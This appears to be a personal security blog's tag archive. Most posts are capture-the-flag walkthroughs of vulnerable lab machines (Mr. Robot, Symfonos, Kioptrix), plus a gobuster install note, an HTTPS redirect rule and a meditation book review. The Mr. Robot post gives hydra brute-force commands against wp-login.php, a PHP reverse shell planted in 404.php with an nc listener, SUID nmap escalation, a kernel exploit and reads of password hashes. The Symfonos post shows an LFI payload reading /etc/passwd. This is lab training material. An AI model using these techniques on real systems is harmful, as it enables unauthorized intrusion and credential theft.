TCERT

Tag: samdup

  • Rooting Mr. Robot

    Rooting Mr. Robot

    Task Goal:

    1. To get root access to the machine

    2. Acquire three keys:

        1. Key 1: 073403c8a58a1f80d943455fb30724b9
        2. Key 2: 822c73956184f694993bede3eb39f959
        3. Key 3: 04787ddef27c3dee1ee161b21670b4e4

     

    Resource Materials:
    Download Mr. Robot Machine from Here.
    Download Kali Linux Machine from Here.

    Information Gathering:

    Step 01:  ifconfig
    Kali Linux Machine IP:  192.168.56.4

    Step 02: nmap 192.168.56.4/24
    Mr. Robot or Target Machine IP: 192.168.56.3


    Step 03:  Get the details of ports and services running on Target Machine

    nmap -sC -sV -p-  192.168.56.3 >  vulhub/mrrobot/nmap.log

    It’s clearly showing that there is a web server  running on port 80 and 443. Let me visit those.

    Yes, I checked the details of the front-end, didn’t find anything of use. Then, I checked the source code.

    Nothing special either.

    I read couple of write-ups in the past and those help me to have a methodology of myself. Usually, at this time, usually I check for availability of robots.txt and if I don’t find any, then I run nikto and gobuster.

    Luckily I found something through robots.txt

    I want to download those files.. By the way, by the look of it, I can deduce one thing that, I need to get three keys and out of those three, here is the first one 🙂 Yippee!

    Step 04: Download all the materials

    wget 192.168.56.3/fsocity.dic

wget 192.168.56.3/key-1-of-3.txt

cat key-1-of-3.txt

073403c8a58a1f80d943455fb30724b9

    To be honest, my happiness did short live.. after the first key, I am reached at my wits end. Therefore, usually at such period, I look carefully to the things I found and if I didn’t find anything substantial, I do enumerate again..

    I have two ideas in my mind.. one is to play around with the word list

     fsocity.dic

    We will launch a brute force attack on wp-login.php page.

    Another one is to perform nikto and gobuster. To save time, I am going to do everything simultaneously…

    Luckily I performed sort, else it will definitely going to take a huge amount of time. (because I found many duplicate datas in the dictionary file which I downloaded from the target website)

    By the way, I have saved a script to perform wp-login.php  bruteforce attack sometime back and I am glad that I can use it here 🙂  (By the way, you don’t have to worry about this script, if you which to learn about this, you can easily fire your burp suite and you will get the main logic and,  man hyra will help you to frame the argument).

    Step 05:

    1. Brute Force  wp-login.php

    a)  We don’t know the username. So first we will do the username brute force.

    hydra -vV -L fsociety.dic -p test 192.168.56.3 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

    b) Username: is elliot
    Now, we need to bruteforce password.  To get password, here is it..

    hydra -vV -l elliot -P fsociety.dic 192.168.56.3 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

    And password is : ER28-0652


    At the background, I would like to run the following two tasks (because I want to dig little more)

    2. Run nikto

    nikto -h 192.168.56.3 > nikto-192.168.56.3.log

    3. Run gobuster

    gobuster dir -u http://192.168.56.3 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

    Step 05: Took huge amount of time (because of Brute Force)

    Anyway, I logged into the website, and luckily “Editor” function is not disabled, that means I can inject my own code in there.  I am going to plant a php reverse shell there in 404.php page. Because not many developer or people care for this page.

    pentest-monkey has great list of scripts.  you can download the php reverse shell from here.  

    I did copy the shell and paste it in 404.php

    By the way, you need to change the IP address and port number which mentioned the the php reverse shell. Port number can be anything of your choice and my favorite is 9000. well the IP address of my Kali Linux Machine is 192.168.56.5 (I reset my machine, you won’t face any problem)

    My Kali Linux (or Attacker) machine is waiting the reverse connection

    nc -lvp 9000

    Now, all I need to do is to visit the 404.php. It indeed thrown reverse connection just by visiting http://192.168.56.5/404.php

    I found the flag2 and a credential file. However, due to privilege restriction, I am not able to access it.

    To be honest, at this moment,  I have left with no choice but to enumerate whether there are any SUID enabled binaries on the server; to escalate my current privilege … let’s try.. (If you need to know more about SUID binary finding, visit this link)

    find / -perm -u=s -type f 2>/dev/null 

/usr/local/bin/nmap --interactive 

!sh 

cat home/robot/key-2-of-3.txt 
822c73956184f694993bede3eb39f959  [our second flag]

cat home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

    Privilege escalation using nmap resource is here.

    I tried john to crack the hash, and vm crashed for several times.. so I decided to move forward. (Later I was able to crack the hash using https://crackstation.net)

    Again bumped to the wall so …what we need to do is enumerate more..

    I read a many articles on eternal-blue and dirty cow, because many of the people recommend to try those (kernel) exploit if you don’t have any option left. At that moment, I thought it is my time to check for kernel exploit. Therefore, I checked the kernel version, and it is indeed vulnerable to an exploit.

    kernel version of the Target machine:

    uname -r

    The kernel version is 3.13.0-55-generic, which is vulnerable to this exploit.

    I did compiled the exploit on the victim machine and executed the exploit on victim machine and yeah.. Got the root as well as the third or the final flag..

    gcc exploit.c -o exploit 
./exploit 
id 
cat /home/root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

     

    Voila!! Finally…

    Although I have popped this machine earlier using msfconsole, but this time, I did it entirely  manually and it’s truly more satisfying and learned many more cool things!!

     

  • How to install gobuster in Kali Linux 2020

    How to install gobuster in Kali Linux 2020

    Hello guys,

    I am sure you must be aware that Kali Linux 2020 distro doesn’t have the gobuster tools pre-loaded in the package, and perhaps many of you already compiled it and made it work in your machines.

    However, I am quite certain that there are still many people who were in the verge of shifting to dirb or dirbuster tools.. (which is also an awesome tool though) just because it is not available in your new distro.

    To be honest, I want to have gobuster in my Kali Machine, therefore, I tried couple of ways and at the end, it did work.

    Thought to share with you guys 🙂

    Peace!

    (more…)

  • Force HTTPS on WordPress

    Force HTTPS on WordPress

    How to implement?

    Code:

    RewriteCond %{HTTPS} !=on
    RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301,NE]

  • “Stages of Meditation”

     I have promised myself to read a book monthly, apart from my regular work, and as for the month of August, I decided to read a book called “Stages of Meditation”. This book was composed by Acharya Kamalashila (A Nalanda Scholar who was invited to Tibet by the King of Tibet; in the 8th century), and His Holiness the Dalai Lama has given many teachings of it. I highly recommend this book to all the friends who are interested in Meditation. This book is written for a Buddhist Practitioner however, it has highlighted many strategies and tips which could benefit even for a non-Buddhist. For example, it has mentioned about the diet you should follow and what kind of environment is suitable for a beginner etc.. At last but not least, I pray that this book will benefit you as much as it did to me.

  • Gaining a Root Access in this rainy season, of Symfonos Machine

    Target Machine Name: Symfonos

    Information in our hand:
    Kali Linux IP Machine: 192.168.56.102

    Got get the victim machine IP address:

    netdiscover -i eth0 -r 192.168.56.102/24

    Victim or Target Machine IP: 192.168.56.101

    Step 01: Active Scanning

    nmap -sC -sV -p- -T4 -A 192.168.56.101 -oN nmap.log
    Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; 

Host script results:

|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS 
| smb-os-discovery: 
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos
| NetBIOS computer name: SYMFONOS\x00
| Domain name: \x00
| FQDN: symfonos
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2019-07-22 12:36:26
|_ start_date: N/A

    Step 2:

    I browse the IP address: 192.168.56.101 and one an image was there.

    Since I didn’t find anything from source code or robots.txt, I used to exiftool and strings as well. It further confirms that I need to shift my area of interest. Therefore, I rechecked the findings we have in nmap.

    It is running smb, therefore, let’s dig in.

    Click on [+Other Locations]
Connect to server: smb://192.168.56.101/      [Type this entire bold values]
Click on [connect]

    From this result, what we can deduce is that there

    username: 
anonymous 
helios  
print$.          

    Subsequently click on Anonymous (because most of the time, anonymous user has either empty password or anonymous as password).  In our case, it doesn’t required one (which means it’s empty)

    We got few password from the note:

    Password:
epidioko
qwerty
baseball

    Things become little easy now, because we have three usernames and passwords and let’s explore which does work.

    Working Credential:

    username: helios 
Password: qwerty

    Step 03:

    Visit: http://192.168.56.101/h3l105/

    It’s wonderful that we now found a WordPress website.

    Step 04:

    I faced many difficulties running wpscan (original ruby based scanner)

    wpscan --url http://192.168.56.101/h3l105/ --enumerate > wpscan.txt

    I manually download the json files and update it nevertheless, I was not able to enumerate the plugins. Therefore, I had to use the wpscan built on python. (actually, I can manually enumerate the plugins and its corresponding versions however, lets think that it might be useful to other boxes as well)

    python wordpresscan.py -u http://192.168.56.101/h3l105/

    Result: 

    [i] Name: site-editor - v4.3
[!]LFI : Site Editor <= 1.1.1 - Local File Inclusion (LFI) - ID:9044
| Fixed in None
| References:
- http://seclists.org/fulldisclosure/2018/Mar/40
- https://github.com/SiteEditor/editor/issues/2
- Cve 2018-7422
[i] Name: mail-masta - v5.2.2
[!]LFI : Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) - ID:8609
| Fixed in None
| References:
- https://cxsecurity.com/issue/WLB-2016080220
- Exploitdb 40290
[!]SQLI : Mail Masta 1.0 - Multiple SQL Injection - ID:8740
| Fixed in None
| References:
- https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
- Cve 2017-6095
- Cve 2017-6096
- Cve 2017-6097
- Cve 2017-6098

    I am very thrilled to see the suggested exploits and plugins. I tried the first plugins and visit the repository as suggested.

    http://192.168.56.101/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

    Bold letters were the exploit. You can find the details here.

    Step 05:

    I am not sure whether it will work however, I would like to share my plan; to try a nc (netcat) reverse connection.

    Despite I tried different ways, I was not able to get a reverse connection. Therefore, I had to try a different plugin (vulnerable plugin) i.e. mail-masta wordpress plugin. 

    Details of the exploit is here.

    To be continued …

  • Will I get a root access to PumpkinGarden ?

    Overview: 

    Kali Linux IP address: 192.168.56.102

PumpkinGarden IP address: 192.168.56.101

    (more…)

  • Kioptrix2014 – Finally

    Kioptrix2014 – Finally

    Kioptrix2014 is one of the most recommended machines to play around prior to  OSCP preparation. Therefore, I am very much eager to shell the box 🙂

    Setup:

    mountroot> ufs:/dev/ada0p2

    *****

    Kali Machine IP: 192.168.56.102

    Step 0:

    ifconfig

    (more…)

  • Exploiting Easy RM to MP3 Converter on Windows 7 (Replica)

    Around five years back, I had the privilege to learn buffer overflow from one of my dear mentor. Nevertheless, due to changes in the nature of my work, I didn’t get proper time to explore more.
    Many of my colleague had shared me their challenges to understanding the concept, despite they were comfortable in programming; I had the other way round experience. I enjoyed the subject back then and perhaps I could say that I was the sole individual who had wrote an exploit for a Vulnerable Application (which we had downloaded from exploit-db.com; it was war-FTP).

    However, I must confess here that I forgot almost everything apart from esp, eip, ebp..

    Required Software:

    Download the vulnerable app from here.

    Download the Window 7 32 bit from here.  (By the way, don’t forget to take a snapshot, as after 30 days you might not access the Virtual Machine. I choose IE11 and VirtualBox).

    Download Immunity Debugger from here. (If you are concerned with providing real email id, you can put some fake ID).

    Download Mona from here. (I must confess, I have never used mona before)

    I will not mention from where you will get,  Kali Linux, Virtualbox and Virtualbox extension etc..

    (more…)